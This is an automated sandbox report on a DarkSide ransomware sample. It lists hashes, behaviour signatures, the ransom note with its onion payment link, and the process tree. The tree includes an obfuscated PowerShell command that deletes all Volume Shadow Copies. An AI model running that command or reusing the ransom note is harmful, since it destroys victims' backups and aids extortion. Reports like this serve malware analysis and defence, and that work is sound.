Resubmissions

27-01-2024 19:37

240127-yb5pksafd3 10

27-01-2024 19:36

240127-ybqwesafc2 10

12-05-2021 15:56

210512-db4t7vmwas 10

Analysis

  • max time kernel
    121s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    27-01-2024 19:36

General

  • Target

    6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe

  • Size

    59KB

  • MD5

    5ff75d33080bb97a8e6b54875c221777

  • SHA1

    810d6c70a96584486867cedde111a1087ed1ebe7

  • SHA256

    6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff

  • SHA512

    a6b87ddcaa797a4d8abc06a786a7186fe43eef5e3291402f81b95a180b7fb746f88cd0f408a089deb5321ecf0d2ac3cca479fdc1f782771749df0ac5a082ac00

  • SSDEEP

    768:9jjV7Iax7F3DS4/S9QCuUSbVtdNcxGV1ylMRY23W5:vx7Fu4/irrUDTV1ylMqZ5

Malware Config

Extracted

Path

C:\Users\Admin\README.398da5ec.TXT

Family

darkside

Ransom Note
----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/45NAQ3FNBX002JPHBAIKB97JVVABJQHTM2HO7XOZRXTEH98CRPXYX09X7VUH0F0W When you open our website, put the following data in the input form: Key: aB8lE86K6bt2yphn16ULYEWUkQgiDkVDBHvQuveSHbkkccXcFdx82fYYL2wEuCLtUlSIpghfBnR1iHFog7qrxDKEfU1MQE8uiUe0CjmMqYp429q5QWYrTRUEJV1UevaixL9cMAeVhTiFRe0PHhthK2V8MfjrySgetDXg40JSiHOZHOstlUnOpJpS6CGn9r9P96kf7j5EFu5dIymVAOfFOxkPx8iG9JDaEHm3hEkCGnII4XNwLbykXoVctE8r6OzBrnKNcLvkQTDMwFQh29kecXcnNniHRXVYNDy2SY49GY58TBuNA6MtaqHht98G9qRjFNAYKdEDX5G6IimaqgNF3QCsOiDko91l70T6rcrVpWNrSdGw4p9tnOyIXUfrUVZFeYManOWT8aqu0qTi2C69L8w1RzezAczWJiwIrt3zfkTLqHKotNih0ebqTia8uUcsHbn6u0z2v3LFDyasrZdNvlKq1rmZmljdEDt0jakl9ygQwOEnd8T7gyygbMUwiF7Nhj8UlGP9o1h2L94qObqhQZGKJFH8DuPbQnf9OczD9cyX0uJTJT5iuiu !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!
URLs

http://darksidfqzcuhtk2.onion/45NAQ3FNBX002JPHBAIKB97JVVABJQHTM2HO7XOZRXTEH98CRPXYX09X7VUH0F0W

Signatures

  • DarkSide

    Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.

  • Renames multiple (205) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Modifies Control Panel 1 IoCs
  • Modifies registry class 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe
    "C:\Users\Admin\AppData\Local\Temp\6228f75f52fd69488419c0e0eb3617b5b894a566a93e52b99a9addced7364cff.exe"
    1⤵
    • Sets desktop wallpaper using registry
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Modifies Control Panel
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1472
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2640
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2960

Network

MITRE ATT&CK Matrix ATT&CK v13

Defense Evasion

Modify Registry

1
T1112

Credential Access

Unsecured Credentials

1
T1552

Credentials In Files

1
T1552.001

Collection

Data from Local System

1
T1005

Impact

Defacement

1
T1491

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
    Filesize

    65KB

    MD5

    ac05d27423a85adc1622c714f2cb6184

    SHA1

    b0fe2b1abddb97837ea0195be70ab2ff14d43198

    SHA256

    c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

    SHA512

    6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

  • C:\Users\Admin\AppData\Local\Temp\Tar61B5.tmp
    Filesize

    89KB

    MD5

    056257f0d885252128315b1bf8cf4681

    SHA1

    958ffce5e2b43e4c17d8f0aa8d51a46703779a1e

    SHA256

    56b124e74fe7d53038c488108fefe4f6f7981684d49755bac713b86e460072b6

    SHA512

    003e9f3a6a120a4d10773ceef56390d25ff1fee60e12bd0ec0ee766ff687217881f6882e840f5f3a7e74ad1c003f9e7375c7223e9b30757af68be9b713192907

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    fbd1d7b15ebf8c9ae736fc2d688fcf6d

    SHA1

    8fd14d5daca45baa6ab5d4b38ec6583084f16e76

    SHA256

    27e13dc78b8994f255444b60f714162fb5ebcd8ace86a42ceea7abec8dd01baa

    SHA512

    5fbf7750e624db4432c734df04dcd955b938d1ed7f74d8b78c3913dfe2929dd4b9b6e165fc6775efc6d676dfc5fa9fd4948a865a0984f28c2f14da2f42906878

  • C:\Users\Admin\README.398da5ec.TXT
    Filesize

    1KB

    MD5

    29adbb559c7cf5a71f3217726f04577f

    SHA1

    4efb812b9e9f341b4272d4beb6c716e79be5fd91

    SHA256

    725a61a2c9301d08ef5510f12410d1ab34b3fa474194b1c45be06d4443248dcd

    SHA512

    1d807ddbf3b93954911b4b9489280ac138d2aa9717339d051d5f117cbc35e59b1ef6aa2daab7bbec6867a95168668d659709fc50e92c5cb8a6db20912c8120d4

  • memory/2640-20-0x0000000002BF0000-0x0000000002C70000-memory.dmp
    Filesize

    512KB

  • memory/2640-24-0x0000000002BF0000-0x0000000002C70000-memory.dmp
    Filesize

    512KB

  • memory/2640-22-0x0000000002BF0000-0x0000000002C70000-memory.dmp
    Filesize

    512KB

  • memory/2640-21-0x000007FEF43F0000-0x000007FEF4D8D000-memory.dmp
    Filesize

    9.6MB

  • memory/2640-25-0x000007FEF43F0000-0x000007FEF4D8D000-memory.dmp
    Filesize

    9.6MB

  • memory/2640-23-0x0000000002BF0000-0x0000000002C70000-memory.dmp
    Filesize

    512KB

  • memory/2640-17-0x000000001B620000-0x000000001B902000-memory.dmp
    Filesize

    2.9MB

  • memory/2640-18-0x000007FEF43F0000-0x000007FEF4D8D000-memory.dmp
    Filesize

    9.6MB

  • memory/2640-19-0x00000000028E0000-0x00000000028E8000-memory.dmp
    Filesize

    32KB